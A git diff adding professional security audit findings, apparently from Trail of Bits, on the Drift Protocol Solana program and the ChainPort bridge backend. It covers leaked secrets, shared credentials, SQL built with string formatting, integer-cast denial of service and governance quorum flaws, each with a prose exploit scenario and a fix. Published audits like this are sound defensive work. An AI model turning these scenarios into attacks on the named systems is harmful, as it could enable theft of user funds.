        OracleValidity::InsufficientDataPoints
    } else if is_stale_for_amm {
        OracleValidity::StaleForAMM
    } else {
        OracleValidity::Valid
    };

    Ok(oracle_validity)
}

Figure 14.2: programs/drift/src/math/oracle.rs#L163–L230

Exploit Scenario Alice, a Drift Protocol developer, is unaware of the implicit hierarchy among the OracleValidity variants. Alice writes code like oracle_validity != OracleValidity::TooUncertain and unknowingly introduces a bug into the codebase.
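Both this finding and TOB-DRIFT-12 recommend a flag-based representation (see the recommendations below). A minimal sketch of the idea, assuming the bitflags crate is added as a dependency; the type and guard names are illustrative, not Drift Protocol’s code:

use bitflags::bitflags;

bitflags! {
    // Hypothetical replacement for the ExchangeStatus enum: each operation
    // can be paused independently, and several can be paused at once.
    pub struct PausedOperations: u8 {
        const FUNDING  = 1 << 0;
        const AMM      = 1 << 1;
        const FILL     = 1 << 2;
        const LIQ      = 1 << 3;
        const WITHDRAW = 1 << 4;
    }
}

// "Active" is the empty set; a full pause is the union of all flags.
fn withdraw_not_paused(paused: PausedOperations) -> bool {
    !paused.contains(PausedOperations::WITHDRAW)
}

Pausing one operation then becomes paused.insert(PausedOperations::FUNDING) rather than overwriting the entire status, which removes the unpause-by-pausing hazard described in TOB-DRIFT-12; OracleValidity could be restructured the same way.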
Recommendations Short term, represent oracle validity as a set of flags. This will allow oracles to be invalid in more than one way, which will result in more robust and maintainable code. Long term, thoroughly test all code that relies on oracle validity. This will help ensure the code’s correctness following the aforementioned change.
+15. Code duplication Severity: Informational Difficulty: High Type: Patching Finding ID: TOB-DRIFT-15 Target: Various files in programs/drift Description Various files in the programs/drift directory contain duplicate code, which can lead to incomplete fixes or inconsistent behavior (e.g., because the code is modified in one location but not all). As an example, the code in figure 15.1 appears nearly verbatim in the functions liquidate_perp, liquidate_spot, liquidate_borrow_for_perp_pnl, and liquidate_perp_pnl_for_deposit.

// check if user exited liquidation territory
let (intermediate_total_collateral, intermediate_margin_requirement_with_buffer) =
    if !canceled_order_ids.is_empty() || lp_shares > 0 {
        ... // 37 lines
        (
            intermediate_total_collateral,
            intermediate_margin_requirement_plus_buffer,
        )
    } else {
        (total_collateral, margin_requirement_plus_buffer)
    };

Figure 15.1: programs/drift/src/controller/liquidation.rs#L201–L246

In some places, the text itself is not obviously duplicated, but the logic it implements is clearly duplicated. An example appears in figures 15.2 and 15.3. Such “logical” code duplication suggests the code does not use the right abstractions.

// Update Market open interest
if let PositionUpdateType::Open = update_type {
    if position.quote_asset_amount == 0 && position.base_asset_amount == 0 {
        market.number_of_users = market.number_of_users.safe_add(1)?;
    }
    market.number_of_users_with_base = market.number_of_users_with_base.safe_add(1)?;
} else if let PositionUpdateType::Close = update_type {
    if new_base_asset_amount == 0 && new_quote_asset_amount == 0 {
        market.number_of_users = market.number_of_users.safe_sub(1)?;
    }
    market.number_of_users_with_base = market.number_of_users_with_base.safe_sub(1)?;
}

Figure 15.2: programs/drift/src/controller/position.rs#L162–L175

if position.quote_asset_amount == 0 && position.base_asset_amount == 0 {
    market.number_of_users = market.number_of_users.safe_add(1)?;
}

position.quote_asset_amount = position.quote_asset_amount.safe_add(delta)?;
market.amm.quote_asset_amount = market.amm.quote_asset_amount.safe_add(delta.cast()?)?;

if position.quote_asset_amount == 0 && position.base_asset_amount == 0 {
    market.number_of_users = market.number_of_users.safe_sub(1)?;
}

Figure 15.3: programs/drift/src/controller/position.rs#L537–L547

Exploit Scenario Alice, a Drift Protocol developer, is asked to fix a bug in liquidate_perp. Alice does not realize that the bug also applies to liquidate_spot, liquidate_borrow_for_perp_pnl, and liquidate_perp_pnl_for_deposit, and fixes the bug in only liquidate_perp. Eve discovers that the bug is not fixed in one of the other three functions and exploits it. Recommendations Short term:
● Refactor liquidate_perp, liquidate_spot, liquidate_borrow_for_perp_pnl, and liquidate_perp_pnl_for_deposit to eliminate the code duplication. This will reduce the likelihood of an incomplete fix for a bug affecting more than one of these functions.
● Identify cases where the code uses the same logic, and implement abstractions to capture that logic. Ensure that code that relies on such logic uses the new abstractions (see the sketch below).
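As an illustration of the second bullet, the duplicated empty-position test from figures 15.2 and 15.3 could be captured once (a sketch only; the field names are taken from the excerpts above, and the integer width is assumed):

// One shared predicate makes the "user has no position" rule explicit.
fn is_position_empty(quote_asset_amount: i64, base_asset_amount: i64) -> bool {
    quote_asset_amount == 0 && base_asset_amount == 0
}

The open path (which tests the current amounts) and the close path (which tests the post-update amounts) would both call this predicate, so a future change to the rule lands in one place.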
Consolidating similar pieces of code will make the overall codebase easier to reason about. Long term, adopt code practices that discourage code duplication. This will help to prevent this problem from recurring.
+16. Inconsistent use of integer types Severity: Informational Difficulty: High Type: Undefined Behavior Finding ID: TOB-DRIFT-16 Target: Various files in programs/drift Description The Drift Protocol codebase uses integer types inconsistently; data of similar kinds is represented using differently sized types or types with different signedness. Conversions from one integer type to another present an opportunity for the contracts to fail and should be avoided. For example, the pow method expects a u32 argument. However, in some places u128 values must be cast to u32 values, even though those values are intended to be used as exponents (figures 16.1, 16.2, and 16.3).

let expo_diff = (spot_market.insurance_fund.shares_base - insurance_fund_stake.if_base)
    .cast::<u32>()?;
let rebase_divisor = 10_u128.pow(expo_diff);

Figure 16.1: programs/drift/src/controller/insurance.rs#L154–L157

#[zero_copy]
#[derive(Default, Eq, PartialEq, Debug)]
#[repr(C)]
pub struct InsuranceFund {
    pub vault: Pubkey,
    pub total_shares: u128,
    pub user_shares: u128,
    pub shares_base: u128, // exponent for lp shares (for rebasing)
    pub unstaking_period: i64, // if_unstaking_period
    pub last_revenue_settle_ts: i64,
    pub revenue_settle_period: i64,
    pub total_factor: u32, // percentage of interest for total insurance
    pub user_factor: u32, // percentage of interest for user staked insurance
}

Figure 16.2: programs/drift/src/state/spot_market.rs#L352–L365

#[account(zero_copy)]
#[derive(Default, Eq, PartialEq, Debug)]
#[repr(C)]
pub struct InsuranceFundStake {
    pub authority: Pubkey,
    if_shares: u128,
    pub last_withdraw_request_shares: u128, // get zero as 0 when not in escrow
    pub if_base: u128, // exponent for if_shares decimal places (for rebase)
    pub last_valid_ts: i64,
    pub last_withdraw_request_value: u64,
    pub last_withdraw_request_ts: i64,
    pub cost_basis: i64,
    pub market_index: u16,
    pub padding: [u8; 14],
}

Figure 16.3: programs/drift/src/state/insurance_fund_stake.rs#L10–L24

The following command reveals 689 locations where the cast method appears to be used: grep -r -I '\.cast\>' programs/drift Each such use could lead to a denial of service if an attacker puts the contract into a state where the cast always errors. Many of these uses could be eliminated by more consistent use of integer types. Note that Drift Protocol has indicated that some of the observed inconsistencies are related to reducing rent costs. Exploit Scenario Mallory manages to put the contract into a state such that one of the nearly 700 uses of cast always returns an error. The contract becomes unusable for Alice, who needs to execute a code path involving the vulnerable cast. Recommendations Short term, review all uses of cast to see which might be eliminated by changing the types of the operands. This will reduce the overall number of casts and reduce the likelihood that one could lead to denial of service. Long term, as new code is introduced into the codebase, review the types used to hold similar kinds of data. This will reduce the likelihood that new casts are needed.
+17.
Use of opaque constants in tests Severity: Informational Difficulty: High Type: Testing Finding ID: TOB-DRIFT-17 Target: programs/drift/src/controller/liquidation/tests.rs Description Several of the Drift Protocol tests use constants with no explanation for how they were derived, which makes it difficult to assess whether the tests are functioning correctly. Ten examples appear in figure 17.1. In each case, a variable or field is compared against a constant consisting of 6–12 random-looking digits. Without an explanation for how these digits were obtained, it is difficult to tell whether the constant expresses the correct value.

assert_eq!(user.spot_positions[0].scaled_balance, 45558159000);
assert_eq!(user.spot_positions[1].scaled_balance, 406768999);
...
assert_eq!(margin_requirement, 44744590);
assert_eq!(total_collateral, 45558159);
assert_eq!(margin_requirement_plus_buffer, 45558128);
...
assert_eq!(token_amount, 406769);
assert_eq!(token_value, 40676900);
assert_eq!(strict_token_value_1, 4067690); // if oracle price is more favorable than twap
...
assert_eq!(liquidator.spot_positions[0].scaled_balance, 159441841000);
...
assert_eq!(liquidator.spot_positions[1].scaled_balance, 593824001);

Figure 17.1: programs/drift/src/controller/liquidation/tests.rs#L1618–L1687

Exploit Scenario Mallory discovers that a constant used in a Drift Protocol test was incorrectly derived and that the tests were actually verifying incorrect behavior. Mallory uses the bug to siphon funds from the Drift Protocol exchange. Recommendations Short term, where possible, compute values using an explicit formula rather than an opaque constant. If using an explicit formula is not possible, include a comment explaining how the constant was derived. This will help to ensure that correct behavior is being tested for. Moreover, the process of giving such explicit formulas could reveal errors. Long term, write scripts to identify constants with high entropy, and run those scripts as part of your CI process. This will help to ensure the aforementioned standards are maintained.
+18. Accounts from contexts are not always used by the instruction Severity: Informational Difficulty: High Type: Access Controls Finding ID: TOB-DRIFT-18 Target: programs/drift/src/instructions/admin.rs Description The context definition for the initialize instruction defines a drift_signer account. However, this account is not used by the instruction. It appears to be a remnant used to pass the address of the state PDA account; however, the need to do this was eliminated by the use of find_program_address to calculate the address. Also, in the initialize_insurance_fund_stake instruction, the spot_market, user_stats, and state accounts from the context are not used by the instruction.
#[derive(Accounts)]
pub struct Initialize<'info> {
    #[account(mut)]
    pub admin: Signer<'info>,
    #[account(
        init,
        seeds = [b"drift_state".as_ref()],
        space = std::mem::size_of::<State>() + 8,
        bump,
        payer = admin
    )]
    pub state: Box<Account<'info, State>>,
    pub quote_asset_mint: Box<Account<'info, Mint>>,
    /// CHECK: checked in `initialize`
    pub drift_signer: AccountInfo<'info>,
    pub rent: Sysvar<'info, Rent>,
    pub system_program: Program<'info, System>,
    pub token_program: Program<'info, Token>,
}

Figure 18.1: programs/drift/src/instructions/admin.rs#L1989–L2007

Exploit Scenario Alice, a Drift Protocol developer, assumes that the drift_signer account is used by the instruction, and she uses a different address for the account, expecting this account to hold the contract state after the initialize instruction has been called. Recommendations Short term, remove the unused accounts from the contexts. This eliminates the possibility of confusion around the use of the accounts. Long term, employ a process where a refactoring of an instruction’s code is followed by a review of the corresponding context definition. This ensures that the context is in sync with the instruction handlers.
+19. Unaligned references are allowed Severity: Informational Difficulty: High Type: Undefined Behavior Finding ID: TOB-DRIFT-19 Target: programs/drift/src/lib.rs Description The Drift Protocol codebase uses the #![allow(unaligned_references)] attribute. This allows the use of unaligned references throughout the program and could mask serious problems in future updates to the contract.

#![allow(clippy::too_many_arguments)]
#![allow(unaligned_references)]
#![allow(clippy::bool_assert_comparison)]
#![allow(clippy::comparison_chain)]

Figure 19.1: programs/drift/src/lib.rs#L1–L4

Exploit Scenario Alice, a Drift Protocol developer, accidentally introduces errors caused by the use of unaligned references, affecting the contract operation and leading to a loss of funds. Recommendations Short term, remove the #![allow(unaligned_references)] attribute. This ensures that the check for unaligned references correctly flags such cases. Long term, be conservative with the use of attributes that suppress warnings or errors throughout the codebase. If possible, apply them to only the minimum possible amount of code. This minimizes the risk of problems stemming from the suppressed checks.
+20. Size of created accounts derived from in-memory representation Severity: Informational Difficulty: High Type: Configuration Finding ID: TOB-DRIFT-20 Target: Files in /programs/drift/src/state/ Description When state accounts are initialized, the size of the account is set to std::mem::size_of::<T>() + 8, where the eight extra bytes are used for the discriminator. The structs for the state types all have a trailing field with padding, seemingly to ensure the account size is aligned to eight bytes and to determine the size of the account. In other places, the code relies on the size_of function to determine the type of accounts passed to the instruction. While we could not find any security-related problem with the scheme today, this does mean that every account’s in-memory representation is inflated by the amount of padding, which could become a problem with respect to the limitation of the stack or heap size. Furthermore, if any of the accounts are updated in such a way that the repr(C) layout size differs from the Anchor space reference, it could cause a problem.
For example, if the SpotMarket struct is changed so that its in-memory representation is smaller than the required Anchor size, the initialize_spot_market instruction would fail because the created account would be too small to hold the serialized representation of the data.

#[account]
#[derive(Default)]
#[repr(C)]
pub struct State {
    pub admin: Pubkey,
    pub whitelist_mint: Pubkey,
    pub discount_mint: Pubkey,
    pub signer: Pubkey,
    pub srm_vault: Pubkey,
    pub perp_fee_structure: FeeStructure,
    pub spot_fee_structure: FeeStructure,
    pub oracle_guard_rails: OracleGuardRails,
    pub number_of_authorities: u64,
    pub number_of_sub_accounts: u64,
    pub lp_cooldown_time: u64,
    pub liquidation_margin_buffer_ratio: u32,
    pub settlement_duration: u16,
    pub number_of_markets: u16,
    pub number_of_spot_markets: u16,
    pub signer_nonce: u8,
    pub min_perp_auction_duration: u8,
    pub default_market_order_time_in_force: u8,
    pub default_spot_auction_duration: u8,
    pub exchange_status: ExchangeStatus,
    pub padding: [u8; 17],
}

Figure 20.1: The State struct, with corresponding padding

#[account(
    init,
    seeds = [b"drift_state".as_ref()],
    space = std::mem::size_of::<State>() + 8,
    bump,
    payer = admin
)]
pub state: Box<Account<'info, State>>,

Figure 20.2: The creation of the State account, using the in-memory size

if data.len() < std::mem::size_of::<T>() + 8 {
    return Ok((None, None));
}

Figure 20.3: An example of the in-memory size used to determine the account type

Exploit Scenario Alice, a Drift Protocol developer, unaware of the implicit requirements of the in-memory size, makes changes to a state account’s structure or adds a new state account struct such that the in-memory size is smaller than the size needed for the serialized data. As a result, instructions in the contract that save data to the account will fail. Recommendations Short term, add an implementation to each state struct that returns the size to be used for the corresponding Solana account. This avoids the overhead of the padding and removes the dependency on assumptions about the in-memory size. Long term, avoid relying on assumptions about the in-memory representation of types within programs written in Rust. This ensures that changes to the representation do not affect the program’s operation.
diff --git a/findings_newupdate/2023-01-keda-securityreview.txt b/findings_newupdate/tob/2023-01-keda-securityreview.txt
similarity index 100%
rename from findings_newupdate/2023-01-keda-securityreview.txt
rename to findings_newupdate/tob/2023-01-keda-securityreview.txt
diff --git a/findings_newupdate/2023-01-ryanshea-noblecurveslibrary-securityreview.txt b/findings_newupdate/tob/2023-01-ryanshea-noblecurveslibrary-securityreview.txt
similarity index 100%
rename from findings_newupdate/2023-01-ryanshea-noblecurveslibrary-securityreview.txt
rename to findings_newupdate/tob/2023-01-ryanshea-noblecurveslibrary-securityreview.txt
diff --git a/findings_newupdate/tob/2023-02-chainport-securityreview.txt b/findings_newupdate/tob/2023-02-chainport-securityreview.txt
new file mode 100644
index 0000000..b8cfd1d
--- /dev/null
+++ b/findings_newupdate/tob/2023-02-chainport-securityreview.txt
@@ -0,0 +1,21 @@
+1. Several secrets checked into source control Severity: Medium Difficulty: High Type: Data Exposure Finding ID: TOB-CHPT-1 Target: The chainport-backend repository Description The chainport-backend repository contains several secrets that are checked into source control.
Secrets that are stored in source control are accessible to anyone who has had access to the repository (e.g., former employees or attackers who have managed to gain access to the repository). We used TruffleHog to identify these secrets (by running the command trufflehog git file://. in the root directory of the repository). TruffleHog found several types of credentials, including the following, which were verified through TruffleHog’s credential verification checks: ● GitHub personal access tokens ● Slack access tokens TruffleHog also found unverified GitLab authentication tokens and Polygon API credentials. Furthermore, we found hard-coded credentials, such as database credentials, in the source code, as shown in figure 1.1. [REDACTED] Figure 1.1: chainport-backend/env.prod.json#L3-L4 Exploit Scenario An attacker obtains a copy of the source code from a former DcentraLab employee. The attacker extracts the secrets from it and uses them to exploit DcentraLab’s database and insert events in the database that did not occur. Consequently, ChainPort’s AWS lambdas process the fake events and allow the attacker to steal funds. Recommendations Short term, remove credentials from source control and rotate them. Run TruffleHog by invoking the trufflehog git file://. command; if it identifies any unverified credentials, check whether they need to be addressed. Long term, consider using a secret management solution such as Vault to store secrets. 2. Same credentials used for staging, test, and production environment databases Severity: Low Difficulty: High Type: Configuration Finding ID: TOB-CHPT-2 Target: Database authentication Description The staging, test, and production environments' databases have the same username and password credentials. Exploit Scenario An attacker is able to obtain the password for the test environment’s database, which is less tightly secured than that of the production environment. He tries the same credentials on the production database and gains access to the database’s contents as well as the ability to write to it. He inserts fake events into the database. ChainPort’s AWS lambdas process the fake events and allow the attacker to steal funds. Recommendations Short term, rotate the current credentials and safely generate different credentials for each environment. This will prevent attackers who have compromised credentials for one environment from accessing other environments. Long term, use a secret management solution such as Vault to store the database credentials instead of relying on configuration files stored in the source code. 3. Use of error-prone pattern for logging functions Severity: Low Difficulty: High Type: Auditing and Logging Finding ID: TOB-CHPT-3 Target: The chainport-backend repository Description The pattern shown in figure 3.1 is used repeatedly throughout the codebase to log function names. [REDACTED] Figure 3.1: An example of the pattern used by ChainPort to log function names This pattern is prone to copy-and-paste errors. Developers may copy the code from one function to another but forget to change the function name, as exemplified in figure 3.2. [REDACTED] Figure 3.2: An example of an incorrect use of the pattern used by ChainPort to log function names We wrote a Semgrep rule to detect these problems (appendix D). This rule detected 46 errors associated with this pattern in the back-end application. Figure 3.3 shows an example of one of these findings. 
[REDACTED] Figure 3.3: An example of one of the 46 errors resulting from the function-name logging pattern (chainport-backend/modules/web_3/helpers.py#L313-L315) Exploit Scenario A ChainPort developer is auditing the back-end application logs to determine the root cause of a bug. Because an incorrect function name was logged, the developer cannot correctly trace the application’s flow and determine the root cause in a timely manner. Recommendations Short term, use the Python decorator in figure 3.4 to log function names. This will eliminate the risk of copy-and-paste errors. [REDACTED] Figure 3.4: A Python decorator that logs function names, eliminating the risk of copy-and-paste errors Long term, review the codebase for other error-prone patterns. If such patterns are found, rewrite the code in a way that eliminates or reduces the risk of errors, and write a Semgrep rule to find the errors before the code hits production. 4. Use of hard-coded strings instead of constants Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-CHPT-4 Target: The chainport-backend repository Description The back-end code uses several hard-coded strings that could be defined as constants to prevent any typos from introducing vulnerabilities. For example, the checks that determine the system’s environment compare the result of the get_env function with the strings “develop”, “staging”, “prod”, or “local”. Figure 4.1 shows an example of one of these checks. [REDACTED] Figure 4.1: chainport-backend/project/lambdas/mainchain/rebalance_monitor.py#L42-L43 We did not find any typos in these literal strings, so we set the severity of this finding to informational. However, the use of hard-coded strings in place of constants is not best practice; we suggest fixing this issue and following other best practices for writing safe code to prevent the introduction of bugs in the future. Exploit Scenario A ChainPort developer creates code that should run only in the development build and safeguards it with the check in figure 4.2. [REDACTED] Figure 4.2: An example of a check against a hard-coded string that could lead to a vulnerability This test always fails—the correct value to test should have been “develop”. Now, the poorly tested, experimental code that was meant to run only in development mode is deployed in production. Recommendations Short term, create a constant for each of the four possible environments. Then, to check the system’s environment, import the corresponding constant and use it in the comparison instead of the hard-coded string. Alternatively, use an enum instead of a string to perform these comparisons. Long term, review the code for other instances of hard-coded strings where constants could be used instead. Create Semgrep rules to ensure that developers never use hard-coded strings where constants are available. 5. Use of incorrect operator in SQLAlchemy filter Severity: Undetermined Difficulty: Undetermined Type: Undefined Behavior Finding ID: TOB-CHPT-5 Target: chainport-backend/project/data/db/port.py#L173 Description The back-end code uses the is not operator in an SQLAlchemy query’s filter. SQLAlchemy relies on the __eq__ family of methods to apply the filter; however, the is and is not operators do not trigger these methods. Therefore, only the comparison operators (== or !=) should be used. 
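For illustration, the toy query below shows the difference (a sketch assuming SQLAlchemy 1.4+; the model is invented and is not ChainPort’s code):

from sqlalchemy import Column, DateTime, Integer, select
from sqlalchemy.orm import declarative_base

Base = declarative_base()

class Port(Base):  # invented model, for illustration only
    __tablename__ = "port"
    id = Column(Integer, primary_key=True)
    completed_at = Column(DateTime, nullable=True)

# Wrong: `is not` is evaluated by Python itself at query-build time and
# yields a plain bool, so no SQL comparison is ever emitted.
bad = select(Port).where(Port.completed_at is not None)

# Right: `!=` is overloaded by SQLAlchemy and compiles to an IS NOT NULL
# clause; `Port.completed_at.is_not(None)` is an equivalent spelling.
good = select(Port).where(Port.completed_at != None)  # noqa: E711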
[REDACTED] Figure 5.1: chainport-backend/project/data/db/port.py#L173 We did not review whether this flaw could be used to bypass the system’s business logic, so we set the severity of this issue to undetermined. Exploit Scenario An attacker exploits this flawed check to bypass the system’s business logic and steal user funds. Recommendations Short term, replace the is not operator with != in the filter indicated above. Long term, to continuously monitor the codebase for reintroductions of this issue, run the python.sqlalchemy.correctness.bad-operator-in-filter.bad-operator-in-filter Semgrep rule as part of the CI/CD flow. References ● SQLAlchemy: Common Filter Operators ● Stack Overflow: Select NULL Values in SQLAlchemy 6. Several functions receive the wrong number of arguments Severity: Undetermined Difficulty: Undetermined Type: Undefined Behavior Finding ID: TOB-CHPT-6 Target: The chainport-backend repository Description Several functions in the chainport-backend repository are called with an incorrect number of arguments: ● Several functions in the /project/deprecated_files folder ● A call to release_tokens_by_maintainer from the rebalance_bridge function (figures 6.1 and 6.2) ● A call to generate_redeem_signature from the regenerate_signature function (figures 6.3 and 6.4) ● A call to get_next_nonce_for_public_address from the prepare_erc20_transfer_transaction function (figures 6.5 and 6.6) ● A call to get_cg_token_address_list from the main function of the file (likely old debugging code) [REDACTED] Figure 6.1: The release_tokens_by_maintainer function is called with four arguments, but at least five are required. (chainport-backend/project/lambdas/mainchain/rebalance_monitor.py#L109-L114) [REDACTED] Figure 6.2: The definition of the release_tokens_by_maintainer function (chainport-backend/project/lambdas/release_tokens_by_maintainer.py#L27-L34) [REDACTED] Figure 6.3: A call to generate_redeem_signature that is missing the network_id argument (chainport-backend/project/scripts/keys_maintainers_signature/regenerate_signature.py#L38-L43) [REDACTED] Figure 6.4: The definition of the generate_redeem_signature function (chainport-backend/project/lambdas/sidechain/events_handlers/handle_burn_event.py#L46-L48) [REDACTED] Figure 6.5: A call to get_next_nonce_for_public_address that is missing the outer_session argument (chainport-backend/project/web3_cp/erc20/prepare_erc20_transfer_transaction.py#L32-L34) [REDACTED] Figure 6.6: The definition of the get_next_nonce_for_public_address function (chainport-backend/project/web3_cp/nonce.py#L19-L21) [REDACTED] Figure 6.7: A call to get_cg_token_address_list that is missing all three arguments (chainport-backend/project/lambdas/token_endpoints/cg_list_get.py#L90-L91) [REDACTED] Figure 6.8: The definition of the get_cg_token_address_list function (chainport-backend/project/lambdas/token_endpoints/cg_list_get.py#L37) We did not review whether this flaw could be used to bypass the system’s business logic, so we set the severity of this issue to undetermined. Exploit Scenario The release_tokens_by_maintainer function is called from the rebalance_bridge function with the incorrect number of arguments. As a result, the rebalance_bridge function fails if the token balance is over the threshold limit, and the tokens are not moved to a safe address. An attacker finds another flaw and is able to steal more tokens than he would have been able to if the tokens were safely stored in another account.
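The long-term recommendation below suggests pylint; for reference, the relevant checks can be run in isolation using pylint’s symbolic message names (worth confirming against the pinned pylint version): pylint --disable=all --enable=no-value-for-parameter,too-many-function-args project/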
Recommendations Short term, fix the errors presented in the description of this finding by adding the missing arguments to the function calls. Long term, run pylint or a similar static analysis tool to detect these problems (and others) before the code is committed and deployed in production. This will ensure that if the list of a function’s arguments ever changes (which was likely the root cause of this problem), a call that does not match the new arguments will be flagged before the code is deployed. 7. Lack of events for critical operations Severity: Informational Difficulty: High Type: Auditing and Logging Finding ID: TOB-CHPT-7 Target: ChainportMainBridge.sol, ChainportSideBridge.sol, Validator.sol, Description Several critical operations do not trigger events. As a result, it will be difficult to review the correct behavior of the contracts once they have been deployed. For example, the setSignatoryAddress function, which is called in the Validator contract to set the signatory address, does not emit an event providing confirmation of that operation to the contract’s caller (figure 7.1). [REDACTED] Figure 7.1: The setSignatoryAddress function in Validator:43-52 Without events, users and blockchain-monitoring systems cannot easily detect suspicious behavior. Exploit Scenario Eve, an attacker, is able to compromise a quorum of the ChainPort congress voters contract. She then sets a new signatory address. Alice, a ChainPort team member, is unaware of the change and does not raise a security incident. Recommendations Short term, add events for all critical operations that result in state changes. Events aid in contract monitoring and the detection of suspicious behavior. Long term, consider using a blockchain-monitoring system to track any suspicious behavior in the contracts. The system relies on several contracts to behave as expected. A monitoring mechanism for critical events would quickly detect any compromised system components. 8. Lack of zero address checks in setter functions Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-CHPT-8 Target: ChainportMainBridge.sol, ChainportMiddleware.sol, ChainportSideBridge.sol Description Certain setter functions fail to validate incoming arguments, so callers can accidentally set important state variables to the zero address. For example, in the initialize function of the ChainportMainBridge contract, developers can define the maintainer registry, the congress address for governance, and the signature validator and set their addresses to the zero address. [REDACTED] Figure 8.1: The initialize function of ChainportMainBridge.sol Failure to immediately reset an address that has been set to the zero address could result in unexpected behavior. Exploit Scenario Alice accidentally sets the ChainPort congress address to the zero address when initializing a new version of the ChainportMainBridge contract. The misconfiguration causes the system to behave unexpectedly, and the system must be redeployed once the misconfiguration is detected. Recommendations Short term, add zero-value checks to all constructor functions and for all setter arguments to ensure that users cannot accidentally set incorrect values, misconfiguring the system. Document any arguments that are intended to be set to the zero address, highlighting the expected values of those arguments on each chain. Long term, use the Slither static analyzer to catch common issues such as this one. 
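For example, the relevant detector can be run on its own with slither . --detect missing-zero-check (detector name as shipped with recent Slither releases).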
Consider integrating a Slither scan into the project’s CI pipeline, pre-commit hooks, or build scripts. 9. Python type annotations are missing from most functions Severity: Low Difficulty: High Type: Undefined Behavior Finding ID: TOB-CHPT-9 Target: The chainport-backend repository Description The back-end code uses Python type annotations; however, their use is sporadic, and most functions are missing them. Exploit Scenario The cg_rest_call function receives the exception argument without specifying its type with a Python type annotation. The get_token_details_by_cg_id function calls cg_rest_call with an object of the incorrect type, an Exception instance instead of an Exception class, causing the program to crash (figure 9.1). [REDACTED] Figure 9.1: chainport-backend/modules/coingecko/api.py#L41-L42 Recommendations Short term, add type annotations to the arguments of every function. This will not prevent the code from crashing or causing undefined behavior during runtime; however, it will allow developers to clearly see each argument’s expected type and static analyzers to better detect type mismatches. Long term, implement checks in the CI/CD pipeline to ensure that code without type annotations is not accepted. 10. Use of libraries with known vulnerabilities Severity: Low Difficulty: Low Type: Patching Finding ID: TOB-CHPT-10 Target: The chainport-backend repository Description The back-end repository uses outdated libraries with known vulnerabilities. We used pip-audit, a tool developed by Trail of Bits with support from Google to audit Python environments and dependency trees for known vulnerabilities, and identified two known vulnerabilities in the project’s dependencies (as shown in figure 10.1). [REDACTED] Figure 10.1: A list of outdated libraries in the back-end repository Recommendations Short term, update the project’s dependencies to their latest versions wherever possible. Use pip-audit to confirm that no vulnerable dependencies remain. Long term, add pip-audit to the project’s CI/CD pipeline. Do not allow builds to succeed with dependencies that have known vulnerabilities. 11. Use of JavaScript instead of TypeScript Severity: Low Difficulty: Low Type: Configuration Finding ID: TOB-CHPT-11 Target: The chainport-app repository Description The ChainPort front end is developed with JavaScript instead of TypeScript. TypeScript is a strongly typed language that compiles to JavaScript. It allows developers to specify the types of variables and function arguments, and TypeScript code will fail to compile if there are type mismatches. By contrast, JavaScript code will crash (or worse) at runtime if there are type mismatches. In summary, TypeScript is preferred over JavaScript for the following reasons: ● It improves code readability; developers can easily identify variable types and the types that functions receive. ● It improves security by providing static type checking that catches errors during compilation. ● It improves support for integrated development environments (IDEs) and other tools by allowing them to reason about the types of variables. Exploit Scenario A bug in the front-end application is missed, and the code is deployed in production. The bug causes the application to crash, preventing users from using it. This bug would have been caught if the front-end application were written in TypeScript. Recommendations Short term, rewrite newer parts of the application in TypeScript.
TypeScript can be used side-by-side with JavaScript in the same application, allowing it to be introduced gradually. Long term, gradually rewrite the whole application in TypeScript. 12. Use of .format to create SQL queries Severity: Informational Difficulty: Medium Type: Data Validation Finding ID: TOB-CHPT-12 Target: [REDACTED] Description The back end builds SQL queries with the .format function. An attacker who controls one of the variables that the function is formatting will be able to inject SQL code to steal information or damage the database. [REDACTED] Figure 12.1: chainport-backend/project/data/db/postgres.py#L4-L24 [REDACTED] Figure 12.2: chainport-backend/project/lambdas/database_monitor/clear_lock.py#L29-L31 None of the fields described above are attacker-controlled, so we set the severity of this finding to informational. However, the use of .format to create SQL queries is an anti-pattern; parameterized queries should be used instead. Exploit Scenario A developer copies the vulnerable code to create a new SQL query. This query receives an attacker-controlled string. The attacker conducts a time-based SQL injection attack, leaking the whole database. Recommendations Short term, use parameterized queries instead of building strings with variables by hand. Long term, create or use a static analysis check that forbids this pattern. This will ensure that this pattern is never reintroduced by a less security-aware developer. 13. Many rules are disabled in the ESLint configuration Severity: Informational Difficulty: High Type: Testing Finding ID: TOB-CHPT-13 Target: chainport-app/.eslintrc.js Description There are 34 rules disabled in the front-end ESLint configuration. Disabling some of these rules does not cause problems, but disabling others reduces the code’s security and reliability (e.g., react/no-unescaped-entities, consistent-return, no-shadow) and the code’s readability (e.g., react/jsx-boolean-value, react/jsx-one-expression-per-line). Furthermore, the code contains 46 inline eslint-disable comments to disable specific rules. While disabling some of these rules in this way may be valid, we recommend adding a comment to each instance explaining why the specific rule was disabled. Recommendations Short term, create a list of rules that can be safely disabled without reducing the code’s security or readability, document the justification, and enable every other rule. Fix any findings that these rules may report. For rules that are disabled with inline eslint-disable comments, include explanatory comments justifying why they are disabled. 14. Congress can lose quorum after manually setting the quorum value Severity: Medium Difficulty: High Type: Configuration Finding ID: TOB-CHPT-14 Target: contracts/governance/ChainportCongressMembersRegistry.sol Description Proposals to the ChainPort congress must be approved by a minimum quorum of members before they can be executed. By default, when a new member is added to the congress, the quorum is updated to be N − 1, where N is the number of congress members. [REDACTED] Figure 14.1: smart-contracts/contracts/governance/ChainportCongressMembersRegistry.sol#L98-L119 However, the congress has the ability to overwrite the quorum number to any nonzero number, including values larger than the current membership.
[REDACTED] Figure 14.2: smart-contracts/contracts/governance/ChainportCongressMembersRegistry.sol#L69-L77 If the congress manually lowers the quorum number and later adds a member, the quorum number will be reset to one less than the total membership. If for some reason certain members are temporarily or permanently unavailable (e.g., they are on vacation or their private keys were destroyed), the minimum quorum would not be reached. Exploit Scenario The ChainPort congress is composed of 10 members. Alice submits a proposal to reduce the minimum quorum to six members to ensure continuity while several members take vacations over a period of several months. During this period, a proposal to add Bob as a new member of the ChainPort congress is passed while Carol and Dave, two other congress members, are on vacation. This unexpectedly resets the minimum quorum to 10 members of the 11-person congress, preventing new proposals from being passed. Recommendations Short term, rewrite the code so that, when a new member is added to the congress, the minimum quorum number increases by one rather than being updated to the current number of congress members subtracted by one. Add a cap to the minimum quorum number to prevent it from being manually set to values larger than the current membership of the congress. Long term, uncouple operations for increasing and decreasing quorum values from operations for making congress membership changes. Instead, require that such operations be included as additional actions in proposals for membership changes. 15. Potential race condition could allow users to bypass PORTX fee payments Severity: Low Difficulty: Medium Type: Timing Finding ID: 